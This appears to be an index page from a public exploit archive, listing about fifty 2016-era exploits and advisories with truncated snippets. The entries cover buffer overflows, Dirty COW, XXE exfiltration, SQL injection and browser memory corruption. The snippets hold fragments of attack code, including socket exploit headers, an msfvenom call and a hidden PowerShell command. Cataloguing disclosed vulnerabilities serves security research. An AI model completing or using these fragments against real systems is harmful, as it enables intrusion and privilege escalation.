Microsoft Edge - CBaseScriptable::PrivateQueryInterface Memory Corruption (MS16-068)
Microsoft Edge - CBaseScriptable::PrivateQueryInterface Memory Corruption MS16-068 Source: http://blog.skylined.nl/20161205001.html Synopsis A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I...
WordPress Plugin Single Personal Message 1.0.3 - SQL Injection
WordPress Plugin Single Personal Message 1.0.3 - SQL Injection Exploit Title: Single Personal Message 1.0.3 – Plugin WordPress – Sql Injection Date: 28/11/2016 Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/simple-personal-message/ Software Link:...
Dup Scout Enterprise 9.1.14 - Remote Buffer Overflow (SEH)
Dup Scout Enterprise 9.1.14 - Remote Buffer Overflow (SEH) #!/usr/bin/python Open the DupScout client and click on Tools, click on Connect Network Drive, type the content of boom.txt in the "User Name" field. The payload is sent to the DupScout server port 9126. SEH based stack overflow in DupScout...
DiskBoss Enterprise 7.4.28 - GET Remote Buffer Overflow
DiskBoss Enterprise 7.4.28 - GET Remote Buffer Overflow #!/usr/bin/python import socket,os,time SEH Stack Overflow in GET request DiskBoss Enterprise 7.4.28 Tested on Windows XP SP3 & Windows 7 Professional For educational purposes only host = "192.168.1.20" port = 80 badchars \x00\x09\x0a\x0d\x20...
NetCat 0.7.1 - Denial of Service
NetCat 0.7.1 - Denial of Service #!/usr/bin/python -*- coding: utf-8 -*- GNU Netcat 0.7.1 - Out of bounds array write Access Violation by n30m1nd Date: 2016-11-19 Exploit Author: n30m1nd Vendor Homepage: http://netcat.sourceforge.net/ Software Link:...
Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities
Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities Exploit Title : Shuttle Tech ADSL WIRELESS 920 WM - Multiple Vulnerabilities Version: Gan9.8U6X-B-TW-R1B0201T1RP Exploit Author : Persian Hack Team Tested on Win Date 2016/12/05 1. Cross Site Scripting PoC : First We Need To login To...
Microsoft Event Viewer 1.0 - XML External Entity Injection
Microsoft Event Viewer 1.0 - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EVENT-VIEWER-XXE-FILE-EXFILTRATION.txt + ISR: ApparitionSec + CVE: CVE-2019-0948 Vendor: ===============...
Apache CouchDB 2.0.0 - Local Privilege Escalation
Apache CouchDB 2.0.0 - Local Privilege Escalation + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/APACHE-COUCHDB-LOCAL-PRIVILEGE-ESCALATION.txt + ISR: ApparitionSec Vendor: ================== couchdb.apache.org Product:...
Microsoft MSINFO32.EXE 6.1.7601 - .NFO XML External Entity Injection
Microsoft MSINFO32.EXE 6.1.7601 - .NFO XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt + ISR: ApparitionSec Vendor: =================...
Microsoft Excel Starter 2010 - XML External Entity Injection
Microsoft Excel Starter 2010 - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-STARTER-XXE-REMOTE-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: =================...
Microsoft Windows Media Center 6.1.7600 - ehshell.exe XML External Entity Injection
Microsoft Windows Media Center 6.1.7600 - ehshell.exe XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor:...
Alcatel Lucent Omnivista 8770 - Remote Code Execution
Alcatel Lucent Omnivista 8770 - Remote Code Execution import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if len(sys.argv) " % sys.argv[0] print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object...
Microsoft Authorization Manager 6.1.7601 - azman XML External Entity Injection
Microsoft Authorization Manager 6.1.7601 - azman XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-AZMAN-XXE-FILE-EXFILTRATION.txt + ISR: ApparitionSec Vendor: ==================...
BlackStratus LOGStorm 4.5.1.35 / 4.5.1.96 - Remote Code Execution
BlackStratus LOGStorm 4.5.1.35 / 4.5.1.96 - Remote Code Execution #!/usr/bin/python logstorm-root.py BlackStratus LOGStorm Remote Root Exploit Jeremy Brown jbrown3264/gmail Dec 2016 -Synopsis- "Better Security and Compliance for Any Size Business" BlackStratus LOGStorm has multiple vulnerabilities th...
Smart Guard Network Manager 6.3.2 - SQL Injection
Smart Guard Network Manager 6.3.2 - SQL Injection Exploit Title: SQL Injection In Smart Guard Network Manager Api Date: 03/12/2016 Exploit Author: Rahul Raz Vendor Homepage: http://www.xsinfoways.com/ Software Name: Smart Guard Network Manager Version: 6.3.2 Tested on: Ubuntu Linux Vulnerability...
Xfinity Gateway - Remote Code Execution
Xfinity Gateway - Remote Code Execution Exploit Title: Xfinity Gateway: Remote Code Execution Date: 12/2/2016 Exploit Author: Gregory Smiley Contact: [email protected] Vendor Homepage: http://xfinity.com Platform: php The page located at /networkdiagnostictools.php has a feature called test...
Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow
Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow #!/usr/bin/python import socket,os,time SEH Stack Overflow in GET request Disk Savvy Enterprise 9.1.14 Tested on Windows XP SP3 && Windows 7 Professional host = "192.168.1.20" port = 80 badchars \x00\x09\x0a\x0d\x20 msfvenom -a x86 --platfo...
Tor (Firefox 41 < 50) - Code Execution
Tor (Firefox 41 < 50) - Code Execution TOR Browser 0day : JavaScript Exploit ! Works on Firefox versions 41 - 50 The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50. When...
Broadcom BCM43xx Wi-Fi - BroadPWN Denial of Service
Broadcom BCM43xx Wi-Fi - BroadPWN Denial of Service This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn...
Xitami Web Server 5.0a0 - Denial of Service
Xitami Web Server 5.0a0 - Denial of Service #!/usr/bin/env python X5 Webserver 5.0 Remote Denial Of Service Exploit Vendor: iMatrix Product web page: http://www.xitami.com Affected version: 5.0a0 Summary: X5 is the latest generation web server from iMatix Corporation. The Xitami product line...
WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion
WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion Exploit Title: WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion Date: 28/11/2016 Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/wp-vault/ Software Link: https://wordpress.org/plugins/wp-vault/ Contact:...
Xfinity Gateway - Cross-Site Request Forgery
Xfinity Gateway - Cross-Site Request Forgery EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY AUTHOR: Pabstersac DATE: 1ST OF AUGUST 2016 CVE: N/A CATEGORY: REMOTE CONTACT: [email protected] IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME. CSRF FOR COMCAST...
WinPower 4.9.0.4 - Local Privilege Escalation
WinPower 4.9.0.4 - Local Privilege Escalation // Exploit Title: WinPower V4.9.0.4 Privilege Escalation // Date: 29-11-2016 // Software Link: http://www.ups-software-download.com/ // Exploit Author: Kacper Szurek // Contact: http://twitter.com/KacperSzurek // Website: http://security.szurek.pl/ //...
NTP 4.2.8p3 - Denial of Service
NTP 4.2.8p3 - Denial of Service #!/usr/bin/env python Exploit Title: ntpd 4.2.8p3 remote DoS Date: 2015-10-21 Bug Discovery: John D "Doug" Birdwell Exploit Author: Magnus Klaaborg Stubman @magnusstubman Website: http://support.ntp.org/bin/view/Main/NtpBug2922 Vendor Homepage: http://www.ntp.org/...
Microsoft Internet Explorer 8/9/10/11 - MSHTML DOMImplementation Type Confusion (MS16-009)
Microsoft Internet Explorer 8/9/10/11 - MSHTML DOMImplementation Type Confusion (MS16-009) Source: http://blog.skylined.nl/20161128001.html Synopsis A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be...
Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow
Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow #!/usr/bin/python print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...
Disk Pulse Enterprise 9.1.16 - Login Remote Buffer Overflow
Disk Pulse Enterprise 9.1.16 - Login Remote Buffer Overflow #!/usr/bin/python print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...
VX Search Enterprise 9.1.12 - Login Remote Buffer Overflow
VX Search Enterprise 9.1.12 - Login Remote Buffer Overflow #!/usr/bin/python print "VX Search Enterprise 9.1.12 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM...
Dup Scout Enterprise 9.1.14 - Login Remote Buffer Overflow
Dup Scout Enterprise 9.1.14 - Login Remote Buffer Overflow #!/usr/bin/python print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM...
Disk Savvy Enterprise 9.1.14 - Login Remote Buffer Overflow
Disk Savvy Enterprise 9.1.14 - Login Remote Buffer Overflow #!/usr/bin/python print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYST...
Microsoft Internet Explorer 8 - MSHTML SRunPointer::SpanQualifierRunType Out-Of-Bounds Read (MS15-009)
Microsoft Internet Explorer 8 - MSHTML SRunPointer::SpanQualifierRunType Out-Of-Bounds Read (MS15-009) .positionfixed { position: fixed; } .positionrelative { position: relative; } .floatleft { float: left; } .complex { float: left; width: 100%; } .complex:first-line { clear: left; } window.onload = function boom...
Sync Breeze Enterprise 9.1.16 - Login Remote Buffer Overflow
Sync Breeze Enterprise 9.1.16 - Login Remote Buffer Overflow #!/usr/bin/python print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...
Google Android - BadKernel Remote Code Execution
Google Android - BadKernel Remote Code Execution function gc forvar i=0;i0.toString16; function log var str = ""; forvar i=0;i"; console.logstr; document.writestr; function setaccessaddressaddress controllerdv.setUint3234,address,true; controllerdv.setUint3244,0x40000000,true; function...
Tenda/Dlink/Tplink TD-W8961ND - DHCP Cross-Site Scripting
Tenda/Dlink/Tplink TD-W8961ND - DHCP Cross-Site Scripting Document Title: =============== Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=1990 Release Date: ============= 2016-11-28 Vulnerability...
Microsoft Internet Explorer 11 - MSHTML CGeneratedContent::HasGeneratedSVGMarker Type Confusion
Microsoft Internet Explorer 11 - MSHTML CGeneratedContent::HasGeneratedSVGMarker Type Confusion window.onload = function () { document.getElementsByTagName("iframe")[0].src = "repro-iframe.html"; } Description Internally MSIE uses various lists of linked CTreePos objects to represent the DOM tree. F...
Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd Method) // // This exploit uses the pokemon exploit of the dirtycow vulnerability // as a base and automatically generates a new passwd line. // The user will be prompted for the new password when the...
Red Hat JBoss EAP - Deserialization of Untrusted Data
Red Hat JBoss EAP - Deserialization of Untrusted Data Security Advisory @ Mediaservice.net Srl 05, 23/11/2016 Data Security Division Title: Red Hat JBoss EAP deserialization of untrusted data Application: JBoss EAP 5.2.X and prior versions Description: The application server deserializes untruste...
Microsoft Internet Explorer 10 - MSHTML CEditAdorner::Detach Use-After-Free (MS13-047)
Microsoft Internet Explorer 10 - MSHTML CEditAdorner::Detach Use-After-Free (MS13-047) var oWindow = window.open("window.xhtml"); setInterval(function () { try { oWindow.eval("" + function () { document.designMode = "on"; document.execCommand("SelectAll"); var oSelection = window.getSelection();...
Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities
Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities Exploit Title: Trend Micro Interscan Web Security Virtual Appliance IWSVA 6.5.x Multiple Vulnerabilities Date: 28/11/2016 Exploit Author: SlidingWindow, Twitter: @KapilKhot Vendor Homepage:...
Core FTP LE 2.2 - SSH/SFTP Remote Buffer Overflow (PoC)
Core FTP LE 2.2 - SSH/SFTP Remote Buffer Overflow (PoC) + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt + ISR: ApparitionSec Vendor: =============== www.coreftp.com Product:...
Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/passwd Method) // EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil // EDB-Note: Recommended way to run: ./dcow -s Will automatically do "echo 0...
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (1)
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (1) Complete Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40823.zip Presentation:...
GNU Wget 1.18 - Access List Bypass Race Condition
GNU Wget 1.18 - Access List Bypass Race Condition ''' ============================================= - Discovered by: Dawid Golunski - dawidatlegalhackers.com - https://legalhackers.com - https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html - CVE-2016-7098 -...
osTicket 1.9.14 - X-Forwarded-For Cross-Site Scripting
osTicket 1.9.14 - X-Forwarded-For Cross-Site Scripting Exploit Title: Osticket 1.9.14 and below X-Forwarded-For Stored XSS. Date: 24-11-2016 Exploit Author: Joaquin Ramirez Martinez i0-SEC Software Link: http://osticket.com/ Vendor: Osticket """ ============== DESCRIPTION ============== osTicket ...
Remote Utilities Host 6.3 - Denial of Service
Remote Utilities Host 6.3 - Denial of Service Exploit Title: Remote Utilities - Host 6.3 - Denial of Service Date: 2016-11-25 Exploit Author: Peter Baris Vendor Homepage: www.remoteutilities.com Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip Version: 6.3.0.6 - other...
Linux Kernel 2.6.32-642 / 3.16.0-4 - inode Integer Overflow
Linux Kernel 2.6.32-642 / 3.16.0-4 - inode Integer Overflow /* Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC The inode is a data structure in a Unix-style file system which describes a filesystem object such as a file or a directory. Each inode stores the attributes and disk block...
UCanCode - Multiple Vulnerabilities
UCanCode - Multiple Vulnerabilities UCanCode multiple vulnerabilities Url: http://www.hmi-software.com/ http://www.ucancode.net/index.htm http://www.ucancode.net/bbs/zhuce/login.htm Description: From vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS,...
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation Source: http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/ Introduction Problem description: Linux user namespaces allow mounting file systems as a normal user, including the...
Crestron AM-100 - Multiple Vulnerabilities
Crestron AM-100 - Multiple Vulnerabilities ================================================================= Crestron AM-100 Multiple Vulnerabilities ================================================================= Date: 2016-08-01 Exploit Author: Zach Lanier Vendor Homepage:...
Ubuntu 15.10 - USERNS Overlayfs Over Fuse Privilege Escalation
Ubuntu 15.10 - USERNS Overlayfs Over Fuse Privilege Escalation Source: http://www.halfdog.net/Security/2016/OverlayfsOverFusePrivilegeEscalation/ Introduction Problem description: On Ubuntu Wily it is possible to place a USERNS overlayfs mount over a fuse mount. The fuse filesystem may contain...